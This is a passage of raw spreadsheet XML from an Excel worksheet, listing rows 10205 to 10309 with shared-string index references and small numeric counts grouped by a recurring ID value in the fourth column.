        <v>1296</v>
      </c>
    </row>
    <row r="10205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10205" t="s">
        <v>16228</v>
      </c>
      <c r="B10205" t="s">
        <v>16211</v>
      </c>
      <c r="C10205">
        <v>0</v>
      </c>
      <c r="D10205">
        <v>4831</v>
      </c>
    </row>
    <row r="10206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10206" t="s">
        <v>16231</v>
      </c>
      <c r="B10206" t="s">
        <v>16212</v>
      </c>
      <c r="C10206">
        <v>0</v>
      </c>
      <c r="D10206">
        <v>4831</v>
      </c>
    </row>
    <row r="10207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10207" t="s">
        <v>16228</v>
      </c>
      <c r="B10207" t="s">
        <v>16213</v>
      </c>
      <c r="C10207">
        <v>0</v>
      </c>
      <c r="D10207">
        <v>4831</v>
      </c>
    </row>
    <row r="10208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10208" t="s">
        <v>16231</v>
      </c>
      <c r="B10208" t="s">
        <v>16214</v>
      </c>
      <c r="C10208">
        <v>0</v>
      </c>
      <c r="D10208">
        <v>4831</v>
      </c>
    </row>
    <row r="10209" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10209" t="s">
        <v>16228</v>
      </c>
      <c r="B10209" t="s">
        <v>16215</v>
      </c>
      <c r="C10209">
        <v>2</v>
      </c>
      <c r="D10209">
        <v>4831</v>
      </c>
    </row>
    <row r="10210" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10210" t="s">
        <v>16231</v>
      </c>
      <c r="B10210" t="s">
        <v>16216</v>
      </c>
      <c r="C10210">
        <v>1</v>
      </c>
      <c r="D10210">
        <v>4831</v>
      </c>
    </row>
    <row r="10211" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10211" t="s">
        <v>16228</v>
      </c>
      <c r="B10211" t="s">
        <v>16217</v>
      </c>
      <c r="C10211">
        <v>1</v>
      </c>
      <c r="D10211">
        <v>4831</v>
      </c>
    </row>
    <row r="10212" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10212" t="s">
        <v>16231</v>
      </c>
      <c r="B10212" t="s">
        <v>16218</v>
      </c>
      <c r="C10212">
        <v>1</v>
      </c>
      <c r="D10212">
        <v>4831</v>
      </c>
    </row>
    <row r="10213" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10213" t="s">
        <v>16229</v>
      </c>
      <c r="B10213" t="s">
        <v>16219</v>
      </c>
      <c r="C10213">
        <v>0</v>
      </c>
      <c r="D10213">
        <v>4831</v>
      </c>
    </row>
    <row r="10214" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10214" t="s">
        <v>16230</v>
      </c>
      <c r="B10214" t="s">
        <v>16220</v>
      </c>
      <c r="C10214">
        <v>0</v>
      </c>
      <c r="D10214">
        <v>4831</v>
      </c>
    </row>
    <row r="10215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10215" t="s">
        <v>16229</v>
      </c>
      <c r="B10215" t="s">
        <v>16221</v>
      </c>
      <c r="C10215">
        <v>6</v>
      </c>
      <c r="D10215">
        <v>4831</v>
      </c>
    </row>
    <row r="10216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10216" t="s">
        <v>16230</v>
      </c>
      <c r="B10216" t="s">
        <v>16222</v>
      </c>
      <c r="C10216">
        <v>6</v>
      </c>
      <c r="D10216">
        <v>4831</v>
      </c>
    </row>
    <row r="10217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10217" t="s">
        <v>16223</v>
      </c>
      <c r="B10217" t="s">
        <v>16223</v>
      </c>
      <c r="C10217">
        <v>25</v>
      </c>
      <c r="D10217">
        <v>4831</v>
      </c>
    </row>
    <row r="10218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10218" t="s">
        <v>16224</v>
      </c>
      <c r="B10218" t="s">
        <v>16224</v>
      </c>
      <c r="C10218">
        <v>1</v>
      </c>
      <c r="D10218">
        <v>4831</v>
      </c>
    </row>
    <row r="10219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10219" t="s">
        <v>16228</v>
      </c>
      <c r="B10219" t="s">
        <v>16211</v>
      </c>
      <c r="C10219">
        <v>0</v>
      </c>
      <c r="D10219">
        <v>4888</v>
      </c>
    </row>
    <row r="10220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10220" t="s">
        <v>16231</v>
      </c>
      <c r="B10220" t="s">
        <v>16212</v>
      </c>
      <c r="C10220">
        <v>0</v>
      </c>
      <c r="D10220">
        <v>4888</v>
      </c>
    </row>
    <row r="10221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10221" t="s">
        <v>16228</v>
      </c>
      <c r="B10221" t="s">
        <v>16213</v>
      </c>
      <c r="C10221">
        <v>0</v>
      </c>
      <c r="D10221">
        <v>4888</v>
      </c>
    </row>
    <row r="10222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10222" t="s">
        <v>16231</v>
      </c>
      <c r="B10222" t="s">
        <v>16214</v>
      </c>
      <c r="C10222">
        <v>0</v>
      </c>
      <c r="D10222">
        <v>4888</v>
      </c>
    </row>
    <row r="10223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10223" t="s">
        <v>16228</v>
      </c>
      <c r="B10223" t="s">
        <v>16215</v>
      </c>
      <c r="C10223">
        <v>0</v>
      </c>
      <c r="D10223">
        <v>4888</v>
      </c>
    </row>
    <row r="10224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10224" t="s">
        <v>16231</v>
      </c>
      <c r="B10224" t="s">
        <v>16216</v>
      </c>
      <c r="C10224">
        <v>3</v>
      </c>
      <c r="D10224">
        <v>4888</v>
      </c>
    </row>
    <row r="10225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10225" t="s">
        <v>16228</v>
      </c>
      <c r="B10225" t="s">
        <v>16217</v>
      </c>
      <c r="C10225">
        <v>5</v>
      </c>
      <c r="D10225">
        <v>4888</v>
      </c>
    </row>
    <row r="10226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10226" t="s">
        <v>16231</v>
      </c>
      <c r="B10226" t="s">
        <v>16218</v>
      </c>
      <c r="C10226">
        <v>3</v>
      </c>
      <c r="D10226">
        <v>4888</v>
      </c>
    </row>
    <row r="10227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10227" t="s">
        <v>16229</v>
      </c>
      <c r="B10227" t="s">
        <v>16219</v>
      </c>
      <c r="C10227">
        <v>0</v>
      </c>
      <c r="D10227">
        <v>4888</v>
      </c>
    </row>
    <row r="10228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10228" t="s">
        <v>16230</v>
      </c>
      <c r="B10228" t="s">
        <v>16220</v>
      </c>
      <c r="C10228">
        <v>0</v>
      </c>
      <c r="D10228">
        <v>4888</v>
      </c>
    </row>
    <row r="10229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10229" t="s">
        <v>16229</v>
      </c>
      <c r="B10229" t="s">
        <v>16221</v>
      </c>
      <c r="C10229">
        <v>5</v>
      </c>
      <c r="D10229">
        <v>4888</v>
      </c>
    </row>
    <row r="10230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10230" t="s">
        <v>16230</v>
      </c>
      <c r="B10230" t="s">
        <v>16222</v>
      </c>
      <c r="C10230">
        <v>10</v>
      </c>
      <c r="D10230">
        <v>4888</v>
      </c>
    </row>
    <row r="10231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10231" t="s">
        <v>16223</v>
      </c>
      <c r="B10231" t="s">
        <v>16223</v>
      </c>
      <c r="C10231">
        <v>365</v>
      </c>
      <c r="D10231">
        <v>4888</v>
      </c>
    </row>
    <row r="10232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10232" t="s">
        <v>16224</v>
      </c>
      <c r="B10232" t="s">
        <v>16224</v>
      </c>
      <c r="C10232">
        <v>1</v>
      </c>
      <c r="D10232">
        <v>4888</v>
      </c>
    </row>
    <row r="10233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10233" t="s">
        <v>16228</v>
      </c>
      <c r="B10233" t="s">
        <v>16211</v>
      </c>
      <c r="C10233">
        <v>0</v>
      </c>
      <c r="D10233">
        <v>4887</v>
      </c>
    </row>
    <row r="10234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10234" t="s">
        <v>16231</v>
      </c>
      <c r="B10234" t="s">
        <v>16212</v>
      </c>
      <c r="C10234">
        <v>0</v>
      </c>
      <c r="D10234">
        <v>4887</v>
      </c>
    </row>
    <row r="10235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10235" t="s">
        <v>16228</v>
      </c>
      <c r="B10235" t="s">
        <v>16213</v>
      </c>
      <c r="C10235">
        <v>0</v>
      </c>
      <c r="D10235">
        <v>4887</v>
      </c>
    </row>
    <row r="10236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10236" t="s">
        <v>16231</v>
      </c>
      <c r="B10236" t="s">
        <v>16214</v>
      </c>
      <c r="C10236">
        <v>0</v>
      </c>
      <c r="D10236">
        <v>4887</v>
      </c>
    </row>
    <row r="10237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10237" t="s">
        <v>16228</v>
      </c>
      <c r="B10237" t="s">
        <v>16215</v>
      </c>
      <c r="C10237">
        <v>1</v>
      </c>
      <c r="D10237">
        <v>4887</v>
      </c>
    </row>
    <row r="10238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10238" t="s">
        <v>16231</v>
      </c>
      <c r="B10238" t="s">
        <v>16216</v>
      </c>
      <c r="C10238">
        <v>0</v>
      </c>
      <c r="D10238">
        <v>4887</v>
      </c>
    </row>
    <row r="10239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10239" t="s">
        <v>16228</v>
      </c>
      <c r="B10239" t="s">
        <v>16217</v>
      </c>
      <c r="C10239">
        <v>5</v>
      </c>
      <c r="D10239">
        <v>4887</v>
      </c>
    </row>
    <row r="10240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10240" t="s">
        <v>16231</v>
      </c>
      <c r="B10240" t="s">
        <v>16218</v>
      </c>
      <c r="C10240">
        <v>0</v>
      </c>
      <c r="D10240">
        <v>4887</v>
      </c>
    </row>
    <row r="10241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10241" t="s">
        <v>16229</v>
      </c>
      <c r="B10241" t="s">
        <v>16219</v>
      </c>
      <c r="C10241">
        <v>1</v>
      </c>
      <c r="D10241">
        <v>4887</v>
      </c>
    </row>
    <row r="10242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10242" t="s">
        <v>16230</v>
      </c>
      <c r="B10242" t="s">
        <v>16220</v>
      </c>
      <c r="C10242">
        <v>0</v>
      </c>
      <c r="D10242">
        <v>4887</v>
      </c>
    </row>
    <row r="10243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10243" t="s">
        <v>16229</v>
      </c>
      <c r="B10243" t="s">
        <v>16221</v>
      </c>
      <c r="C10243">
        <v>5</v>
      </c>
      <c r="D10243">
        <v>4887</v>
      </c>
    </row>
    <row r="10244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10244" t="s">
        <v>16230</v>
      </c>
      <c r="B10244" t="s">
        <v>16222</v>
      </c>
      <c r="C10244">
        <v>0</v>
      </c>
      <c r="D10244">
        <v>4887</v>
      </c>
    </row>
    <row r="10245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10245" t="s">
        <v>16223</v>
      </c>
      <c r="B10245" t="s">
        <v>16223</v>
      </c>
      <c r="C10245">
        <v>25</v>
      </c>
      <c r="D10245">
        <v>4887</v>
      </c>
    </row>
    <row r="10246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10246" t="s">
        <v>16224</v>
      </c>
      <c r="B10246" t="s">
        <v>16224</v>
      </c>
      <c r="C10246">
        <v>1</v>
      </c>
      <c r="D10246">
        <v>4887</v>
      </c>
    </row>
    <row r="10247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10247" t="s">
        <v>16228</v>
      </c>
      <c r="B10247" t="s">
        <v>16211</v>
      </c>
      <c r="C10247">
        <v>0</v>
      </c>
      <c r="D10247">
        <v>1663</v>
      </c>
    </row>
    <row r="10248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10248" t="s">
        <v>16231</v>
      </c>
      <c r="B10248" t="s">
        <v>16212</v>
      </c>
      <c r="C10248">
        <v>0</v>
      </c>
      <c r="D10248">
        <v>1663</v>
      </c>
    </row>
    <row r="10249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10249" t="s">
        <v>16228</v>
      </c>
      <c r="B10249" t="s">
        <v>16213</v>
      </c>
      <c r="C10249">
        <v>0</v>
      </c>
      <c r="D10249">
        <v>1663</v>
      </c>
    </row>
    <row r="10250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10250" t="s">
        <v>16231</v>
      </c>
      <c r="B10250" t="s">
        <v>16214</v>
      </c>
      <c r="C10250">
        <v>0</v>
      </c>
      <c r="D10250">
        <v>1663</v>
      </c>
    </row>
    <row r="10251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10251" t="s">
        <v>16228</v>
      </c>
      <c r="B10251" t="s">
        <v>16215</v>
      </c>
      <c r="C10251">
        <v>2</v>
      </c>
      <c r="D10251">
        <v>1663</v>
      </c>
    </row>
    <row r="10252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10252" t="s">
        <v>16231</v>
      </c>
      <c r="B10252" t="s">
        <v>16216</v>
      </c>
      <c r="C10252">
        <v>2</v>
      </c>
      <c r="D10252">
        <v>1663</v>
      </c>
    </row>
    <row r="10253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10253" t="s">
        <v>16228</v>
      </c>
      <c r="B10253" t="s">
        <v>16217</v>
      </c>
      <c r="C10253">
        <v>15</v>
      </c>
      <c r="D10253">
        <v>1663</v>
      </c>
    </row>
    <row r="10254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10254" t="s">
        <v>16231</v>
      </c>
      <c r="B10254" t="s">
        <v>16218</v>
      </c>
      <c r="C10254">
        <v>10</v>
      </c>
      <c r="D10254">
        <v>1663</v>
      </c>
    </row>
    <row r="10255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10255" t="s">
        <v>16229</v>
      </c>
      <c r="B10255" t="s">
        <v>16219</v>
      </c>
      <c r="C10255">
        <v>0</v>
      </c>
      <c r="D10255">
        <v>1663</v>
      </c>
    </row>
    <row r="10256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10256" t="s">
        <v>16230</v>
      </c>
      <c r="B10256" t="s">
        <v>16220</v>
      </c>
      <c r="C10256">
        <v>0</v>
      </c>
      <c r="D10256">
        <v>1663</v>
      </c>
    </row>
    <row r="10257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10257" t="s">
        <v>16229</v>
      </c>
      <c r="B10257" t="s">
        <v>16221</v>
      </c>
      <c r="C10257">
        <v>30</v>
      </c>
      <c r="D10257">
        <v>1663</v>
      </c>
    </row>
    <row r="10258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10258" t="s">
        <v>16230</v>
      </c>
      <c r="B10258" t="s">
        <v>16222</v>
      </c>
      <c r="C10258">
        <v>25</v>
      </c>
      <c r="D10258">
        <v>1663</v>
      </c>
    </row>
    <row r="10259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10259" t="s">
        <v>16223</v>
      </c>
      <c r="B10259" t="s">
        <v>16223</v>
      </c>
      <c r="C10259">
        <v>30</v>
      </c>
      <c r="D10259">
        <v>1663</v>
      </c>
    </row>
    <row r="10260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10260" t="s">
        <v>16224</v>
      </c>
      <c r="B10260" t="s">
        <v>16224</v>
      </c>
      <c r="C10260">
        <v>2</v>
      </c>
      <c r="D10260">
        <v>1663</v>
      </c>
    </row>
    <row r="10261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10261" t="s">
        <v>16228</v>
      </c>
      <c r="B10261" t="s">
        <v>16211</v>
      </c>
      <c r="C10261">
        <v>0</v>
      </c>
      <c r="D10261">
        <v>4866</v>
      </c>
    </row>
    <row r="10262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10262" t="s">
        <v>16231</v>
      </c>
      <c r="B10262" t="s">
        <v>16212</v>
      </c>
      <c r="C10262">
        <v>0</v>
      </c>
      <c r="D10262">
        <v>4866</v>
      </c>
    </row>
    <row r="10263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10263" t="s">
        <v>16228</v>
      </c>
      <c r="B10263" t="s">
        <v>16213</v>
      </c>
      <c r="C10263">
        <v>0</v>
      </c>
      <c r="D10263">
        <v>4866</v>
      </c>
    </row>
    <row r="10264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10264" t="s">
        <v>16231</v>
      </c>
      <c r="B10264" t="s">
        <v>16214</v>
      </c>
      <c r="C10264">
        <v>0</v>
      </c>
      <c r="D10264">
        <v>4866</v>
      </c>
    </row>
    <row r="10265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10265" t="s">
        <v>16228</v>
      </c>
      <c r="B10265" t="s">
        <v>16215</v>
      </c>
      <c r="C10265">
        <v>0</v>
      </c>
      <c r="D10265">
        <v>4866</v>
      </c>
    </row>
    <row r="10266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10266" t="s">
        <v>16231</v>
      </c>
      <c r="B10266" t="s">
        <v>16216</v>
      </c>
      <c r="C10266">
        <v>2</v>
      </c>
      <c r="D10266">
        <v>4866</v>
      </c>
    </row>
    <row r="10267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10267" t="s">
        <v>16228</v>
      </c>
      <c r="B10267" t="s">
        <v>16217</v>
      </c>
      <c r="C10267">
        <v>0</v>
      </c>
      <c r="D10267">
        <v>4866</v>
      </c>
    </row>
    <row r="10268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10268" t="s">
        <v>16231</v>
      </c>
      <c r="B10268" t="s">
        <v>16218</v>
      </c>
      <c r="C10268">
        <v>8</v>
      </c>
      <c r="D10268">
        <v>4866</v>
      </c>
    </row>
    <row r="10269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10269" t="s">
        <v>16229</v>
      </c>
      <c r="B10269" t="s">
        <v>16219</v>
      </c>
      <c r="C10269">
        <v>0</v>
      </c>
      <c r="D10269">
        <v>4866</v>
      </c>
    </row>
    <row r="10270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10270" t="s">
        <v>16230</v>
      </c>
      <c r="B10270" t="s">
        <v>16220</v>
      </c>
      <c r="C10270">
        <v>0</v>
      </c>
      <c r="D10270">
        <v>4866</v>
      </c>
    </row>
    <row r="10271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10271" t="s">
        <v>16229</v>
      </c>
      <c r="B10271" t="s">
        <v>16221</v>
      </c>
      <c r="C10271">
        <v>5</v>
      </c>
      <c r="D10271">
        <v>4866</v>
      </c>
    </row>
    <row r="10272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10272" t="s">
        <v>16230</v>
      </c>
      <c r="B10272" t="s">
        <v>16222</v>
      </c>
      <c r="C10272">
        <v>0</v>
      </c>
      <c r="D10272">
        <v>4866</v>
      </c>
    </row>
    <row r="10273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10273" t="s">
        <v>16223</v>
      </c>
      <c r="B10273" t="s">
        <v>16223</v>
      </c>
      <c r="C10273">
        <v>30</v>
      </c>
      <c r="D10273">
        <v>4866</v>
      </c>
    </row>
    <row r="10274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10274" t="s">
        <v>16224</v>
      </c>
      <c r="B10274" t="s">
        <v>16224</v>
      </c>
      <c r="C10274">
        <v>1</v>
      </c>
      <c r="D10274">
        <v>4866</v>
      </c>
    </row>
    <row r="10275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10275" t="s">
        <v>16228</v>
      </c>
      <c r="B10275" t="s">
        <v>16211</v>
      </c>
      <c r="C10275">
        <v>0</v>
      </c>
      <c r="D10275">
        <v>658</v>
      </c>
    </row>
    <row r="10276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10276" t="s">
        <v>16231</v>
      </c>
      <c r="B10276" t="s">
        <v>16212</v>
      </c>
      <c r="C10276">
        <v>0</v>
      </c>
      <c r="D10276">
        <v>658</v>
      </c>
    </row>
    <row r="10277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10277" t="s">
        <v>16228</v>
      </c>
      <c r="B10277" t="s">
        <v>16213</v>
      </c>
      <c r="C10277">
        <v>1</v>
      </c>
      <c r="D10277">
        <v>658</v>
      </c>
    </row>
    <row r="10278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10278" t="s">
        <v>16231</v>
      </c>
      <c r="B10278" t="s">
        <v>16214</v>
      </c>
      <c r="C10278">
        <v>3</v>
      </c>
      <c r="D10278">
        <v>658</v>
      </c>
    </row>
    <row r="10279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10279" t="s">
        <v>16228</v>
      </c>
      <c r="B10279" t="s">
        <v>16215</v>
      </c>
      <c r="C10279">
        <v>3</v>
      </c>
      <c r="D10279">
        <v>658</v>
      </c>
    </row>
    <row r="10280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10280" t="s">
        <v>16231</v>
      </c>
      <c r="B10280" t="s">
        <v>16216</v>
      </c>
      <c r="C10280">
        <v>9</v>
      </c>
      <c r="D10280">
        <v>658</v>
      </c>
    </row>
    <row r="10281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10281" t="s">
        <v>16228</v>
      </c>
      <c r="B10281" t="s">
        <v>16217</v>
      </c>
      <c r="C10281">
        <v>4</v>
      </c>
      <c r="D10281">
        <v>658</v>
      </c>
    </row>
    <row r="10282" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10282" t="s">
        <v>16231</v>
      </c>
      <c r="B10282" t="s">
        <v>16218</v>
      </c>
      <c r="C10282">
        <v>2</v>
      </c>
      <c r="D10282">
        <v>658</v>
      </c>
    </row>
    <row r="10283" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10283" t="s">
        <v>16229</v>
      </c>
      <c r="B10283" t="s">
        <v>16219</v>
      </c>
      <c r="C10283">
        <v>0</v>
      </c>
      <c r="D10283">
        <v>658</v>
      </c>
    </row>
    <row r="10284" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10284" t="s">
        <v>16230</v>
      </c>
      <c r="B10284" t="s">
        <v>16220</v>
      </c>
      <c r="C10284">
        <v>1</v>
      </c>
      <c r="D10284">
        <v>658</v>
      </c>
    </row>
    <row r="10285" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10285" t="s">
        <v>16229</v>
      </c>
      <c r="B10285" t="s">
        <v>16221</v>
      </c>
      <c r="C10285">
        <v>20</v>
      </c>
      <c r="D10285">
        <v>658</v>
      </c>
    </row>
    <row r="10286" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10286" t="s">
        <v>16230</v>
      </c>
      <c r="B10286" t="s">
        <v>16222</v>
      </c>
      <c r="C10286">
        <v>10</v>
      </c>
      <c r="D10286">
        <v>658</v>
      </c>
    </row>
    <row r="10287" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10287" t="s">
        <v>16223</v>
      </c>
      <c r="B10287" t="s">
        <v>16223</v>
      </c>
      <c r="C10287">
        <v>0</v>
      </c>
      <c r="D10287">
        <v>658</v>
      </c>
    </row>
    <row r="10288" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10288" t="s">
        <v>16224</v>
      </c>
      <c r="B10288" t="s">
        <v>16224</v>
      </c>
      <c r="C10288">
        <v>0</v>
      </c>
      <c r="D10288">
        <v>658</v>
      </c>
    </row>
    <row r="10289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10289" t="s">
        <v>16228</v>
      </c>
      <c r="B10289" t="s">
        <v>16211</v>
      </c>
      <c r="C10289">
        <v>0</v>
      </c>
      <c r="D10289">
        <v>1211</v>
      </c>
    </row>
    <row r="10290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10290" t="s">
        <v>16231</v>
      </c>
      <c r="B10290" t="s">
        <v>16212</v>
      </c>
      <c r="C10290">
        <v>0</v>
      </c>
      <c r="D10290">
        <v>1211</v>
      </c>
    </row>
    <row r="10291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10291" t="s">
        <v>16228</v>
      </c>
      <c r="B10291" t="s">
        <v>16213</v>
      </c>
      <c r="C10291">
        <v>0</v>
      </c>
      <c r="D10291">
        <v>1211</v>
      </c>
    </row>
    <row r="10292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10292" t="s">
        <v>16231</v>
      </c>
      <c r="B10292" t="s">
        <v>16214</v>
      </c>
      <c r="C10292">
        <v>0</v>
      </c>
      <c r="D10292">
        <v>1211</v>
      </c>
    </row>
    <row r="10293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10293" t="s">
        <v>16228</v>
      </c>
      <c r="B10293" t="s">
        <v>16215</v>
      </c>
      <c r="C10293">
        <v>0</v>
      </c>
      <c r="D10293">
        <v>1211</v>
      </c>
    </row>
    <row r="10294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10294" t="s">
        <v>16231</v>
      </c>
      <c r="B10294" t="s">
        <v>16216</v>
      </c>
      <c r="C10294">
        <v>2</v>
      </c>
      <c r="D10294">
        <v>1211</v>
      </c>
    </row>
    <row r="10295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10295" t="s">
        <v>16228</v>
      </c>
      <c r="B10295" t="s">
        <v>16217</v>
      </c>
      <c r="C10295">
        <v>2</v>
      </c>
      <c r="D10295">
        <v>1211</v>
      </c>
    </row>
    <row r="10296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10296" t="s">
        <v>16231</v>
      </c>
      <c r="B10296" t="s">
        <v>16218</v>
      </c>
      <c r="C10296">
        <v>2</v>
      </c>
      <c r="D10296">
        <v>1211</v>
      </c>
    </row>
    <row r="10297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10297" t="s">
        <v>16229</v>
      </c>
      <c r="B10297" t="s">
        <v>16219</v>
      </c>
      <c r="C10297">
        <v>0</v>
      </c>
      <c r="D10297">
        <v>1211</v>
      </c>
    </row>
    <row r="10298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10298" t="s">
        <v>16230</v>
      </c>
      <c r="B10298" t="s">
        <v>16220</v>
      </c>
      <c r="C10298">
        <v>0</v>
      </c>
      <c r="D10298">
        <v>1211</v>
      </c>
    </row>
    <row r="10299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10299" t="s">
        <v>16229</v>
      </c>
      <c r="B10299" t="s">
        <v>16221</v>
      </c>
      <c r="C10299">
        <v>4</v>
      </c>
      <c r="D10299">
        <v>1211</v>
      </c>
    </row>
    <row r="10300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10300" t="s">
        <v>16230</v>
      </c>
      <c r="B10300" t="s">
        <v>16222</v>
      </c>
      <c r="C10300">
        <v>22</v>
      </c>
      <c r="D10300">
        <v>1211</v>
      </c>
    </row>
    <row r="10301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10301" t="s">
        <v>16223</v>
      </c>
      <c r="B10301" t="s">
        <v>16223</v>
      </c>
      <c r="C10301">
        <v>30</v>
      </c>
      <c r="D10301">
        <v>1211</v>
      </c>
    </row>
    <row r="10302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10302" t="s">
        <v>16224</v>
      </c>
      <c r="B10302" t="s">
        <v>16224</v>
      </c>
      <c r="C10302">
        <v>1</v>
      </c>
      <c r="D10302">
        <v>1211</v>
      </c>
    </row>
    <row r="10303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10303" t="s">
        <v>16228</v>
      </c>
      <c r="B10303" t="s">
        <v>16211</v>
      </c>
      <c r="C10303">
        <v>0</v>
      </c>
      <c r="D10303">
        <v>4921</v>
      </c>
    </row>
    <row r="10304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10304" t="s">
        <v>16231</v>
      </c>
      <c r="B10304" t="s">
        <v>16212</v>
      </c>
      <c r="C10304">
        <v>0</v>
      </c>
      <c r="D10304">
        <v>4921</v>
      </c>
    </row>
    <row r="10305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10305" t="s">
        <v>16228</v>
      </c>
      <c r="B10305" t="s">
        <v>16213</v>
      </c>
      <c r="C10305">
        <v>0</v>
      </c>
      <c r="D10305">
        <v>4921</v>
      </c>
    </row>
    <row r="10306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10306" t="s">
        <v>16231</v>
      </c>
      <c r="B10306" t="s">
        <v>16214</v>
      </c>
      <c r="C10306">
        <v>0</v>
      </c>
      <c r="D10306">
        <v>4921</v>
      </c>
    </row>
    <row r="10307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10307" t="s">
        <v>16228</v>
      </c>
      <c r="B10307" t="s">
        <v>16215</v>
      </c>
      <c r="C10307">
        <v>1</v>
      </c>
      <c r="D10307">
        <v>4921</v>
      </c>
    </row>
    <row r="10308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10308" t="s">
        <v>16231</v>
      </c>
      <c r="B10308" t="s">
        <v>16216</v>
      </c>
      <c r="C10308">
        <v>0</v>
      </c>
      <c r="D10308">
        <v>4921</v>
      </c>
    </row>
    <row r="10309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10309" t="s">
        <v>16228</v>
      </c>
      <c r="B10309" t="s">
        <v>16217</v>
      </c>
      <c r="C10309">
        <v>2</v>
      </c>
